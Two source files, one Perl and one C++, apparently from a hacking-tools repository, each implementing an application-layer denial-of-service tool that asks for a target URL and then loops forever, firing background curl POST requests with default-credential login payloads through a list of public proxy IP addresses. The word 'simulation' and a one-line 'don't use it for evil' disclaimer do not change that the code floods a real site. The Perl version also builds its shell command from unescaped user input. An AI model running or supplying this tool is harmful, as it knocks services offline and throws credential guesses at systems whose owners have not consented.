File: hacking_with_perl/DoS.pl
#!/usr/bin/perl
use strict;
use warnings;

# Define colors
my $RED = "\e[0;31m";
my $GREEN = "\e[0;32m";
my $NC = "\e[0m"; # No Color

# Array of payloads
my @payloads = (
    "username=admin&password=password",
    "username=root&password=123456",
    "username=test&password=test123",
    "username=admin&password=admin",
    "username=root&password=toor",
    "username=guest&password=guest",
    "username=admin&password=123456",
    "username=root&password=password",
    "username=test&password=password123",
    "username=admin&password=pass123",
    # Add more payloads here
);

# Array of proxy servers
my @proxy_servers = (
    "8.210.54.50:10081",
    "45.76.15.12:11969",
    "45.70.30.196:5566",
    "223.155.121.75:3128",
    "108.175.24.1:13135",
    # Add more proxy servers here
);

# Function to simulate Application Layer DoS Attack
sub simulate_application_layer_dos_attack {
    my ($target_url) = @_;
    print "${GREEN}Simulating Application Layer DoS Attack on $target_url ...${NC}\n";
    
    # Trap Ctrl+C to stop the attack
    $SIG{'INT'} = sub {
        print "\n${RED}DoS attack stopped.${NC}\n";
        exit;
    };

    # Infinite loop for continuous attack
    while (1) {
        # Select a random payload from the array
        my $random_index = int(rand(scalar @payloads));
        my $payload = $payloads[$random_index];

        # Select a random proxy server from the array
        my $random_proxy_index = int(rand(scalar @proxy_servers));
        my $proxy_server = $proxy_servers[$random_proxy_index];

        # Send HTTP POST request with the selected payload using the proxy server
        system("curl -s -X POST -d '$payload' -x '$proxy_server' '$target_url' &");
    }
}

# Main function
sub main {
    print "${GREEN}Application Layer DoS Attack Simulation Tool${NC}\n";
    print "${GREEN}--------------------------------------------${NC}\n";

    # Prompt the user to input the target website link
    print "${RED}Enter your target website link: ${NC}";
    my $target_url = <STDIN>;
    chomp($target_url);

    # Prompt the user to continue with the DoS attack
    print "${RED}Do you want to continue with the DoS attack? (y/n): ${NC}";
    my $continue_attack = <STDIN>;
    chomp($continue_attack);

    if (lc($continue_attack) eq 'y') {
        # Perform Application Layer DoS Attack Simulation
        simulate_application_layer_dos_attack($target_url);
    } else {
        print "${GREEN}DoS attack aborted.${NC}\n";
    }
}

# Call main function
main();

File: hacking_with_c++/Dos.cpp
#include <iostream>
#include <vector>
#include <cstdlib>
#include <ctime>
#include <unistd.h>

// Define colors
#define RED "\033[0;31m"
#define GREEN "\033[0;32m"
#define NC "\033[0m" // No Color

// Array of payloads
std::vector<std::string> payloads = {
    "username=admin&password=password",
    "username=root&password=123456",
    "username=test&password=test123",
    "username=admin&password=admin",
    "username=root&password=toor",
    "username=guest&password=guest",
    "username=admin&password=123456",
    "username=root&password=password",
    "username=test&password=password123",
    "username=admin&password=pass123",
    // Additional payloads
    "username=admin&password=letmein",
    "username=admin&password=password123",
    "username=test&password=test",
    "username=admin&password=administrator",
    "username=root&password=pass",
    // More payloads
    "username=superuser&password=superuser123",
    "username=manager&password=manager",
    "username=admin&password=secret",
    "username=tester&password=tester",
    "username=developer&password=developer123",
    // Add even more payloads here
};

// Array of proxy servers
std::vector<std::string> proxy_servers = {
    "8.210.54.50:10081",
    "45.76.15.12:11969",
    "45.70.30.196:5566",
    "223.155.121.75:3128",
    "108.175.24.1:13135"
    // Add more proxy servers here
};

// Function to test for DoS protection
bool test_dos_protection() {
    // You can implement your test here
    // For demonstration, always assume there is no protection
    return false;
}

// Function to perform Application Layer DoS Attack Simulation
void simulate_application_layer_dos_attack(const std::string& target_url) {
    std::cout << GREEN << "Simulating Application Layer DoS Attack on " << target_url << " ..." << NC << std::endl;
    
    // Infinite loop for continuous attack
    while (true) {
        // Select a random payload from the array
        int random_index = rand() % payloads.size();
        std::string payload = payloads[random_index];
        
        // Select a random proxy server from the array
        int random_proxy_index = rand() % proxy_servers.size();
        std::string proxy_server = proxy_servers[random_proxy_index];
        
        // Send HTTP POST request with the selected payload using the proxy server
        std::string command = "curl -s -X POST -d \"" + payload + "\" -x \"" + proxy_server + "\" \"" + target_url + "\" &";
        system(command.c_str());
    }
}

// Main function
int main() {
    std::cout << GREEN << "Application Layer DoS Attack Simulation Tool" << NC << std::endl;
    std::cout << NC << "***Don't use it for evil purpose***" << NC << std::endl;
    std::cout << GREEN << "--------------------------------------------" << NC << std::endl;

    // Prompt the user to input the target website link
    std::string target_url;
    std::cout << RED << "Enter your target website link: " << NC;
    std::getline(std::cin, target_url);

    // Check for DoS protection
    if (test_dos_protection()) {
        std::cout << RED << "DoS protection detected! Attempting to bypass..." << NC << std::endl;
        // Implement bypass mechanisms here
        // For demonstration, no bypass mechanisms are implemented
        std::cout << RED << "Bypass attempt complete." << NC << std::endl;
    } else {
        std::cout << GREEN << "No DoS protection detected." << NC << std::endl;
    }

    // Prompt the user to continue with the DoS attack
    char continue_attack;
    std::cout << RED << "Do you want to continue with the DoS attack? (y/n): " << NC;
    std::cin >> continue_attack;
    if (continue_attack == 'y' || continue_attack == 'Y') {
        // Perform Application Layer DoS Attack Simulation
        simulate_application_layer_dos_attack(target_url);
    } else {
        std::cout << GREEN << "DoS attack aborted." << NC << std::endl;
    }

    return 0;
}
